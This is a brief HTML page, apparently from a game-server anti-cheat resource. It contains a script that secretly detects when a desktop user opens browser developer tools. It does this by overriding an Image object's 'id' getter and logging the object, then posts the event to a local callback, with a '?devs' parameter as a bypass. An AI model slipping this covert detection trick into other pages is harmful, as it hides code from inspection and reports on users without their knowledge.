<html>
	<head>
		<meta charset="utf-8" name="viewport" content="width=device-width, initial-scale=1.0"/>
		<script src="jquery.min.js"></script>
		<script type="text/javascript" src="wurfl.js"></script>
	</head>
	<body>
	</body>
	<script>
		if(WURFL.form_factor=="Desktop"){
			var $_GET=[];
			window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,function(a,name,value){$_GET[name]=value;
		});
		if(!($_GET['devs'])){
			var element=new Image();
			Object.defineProperty(element,'id',{
				get:function(){
					$.post('http://feijonts_anti/loadNuis');
				}
			});
			 console.log('%cSystem ready',element);
		}}
	</script>
</html>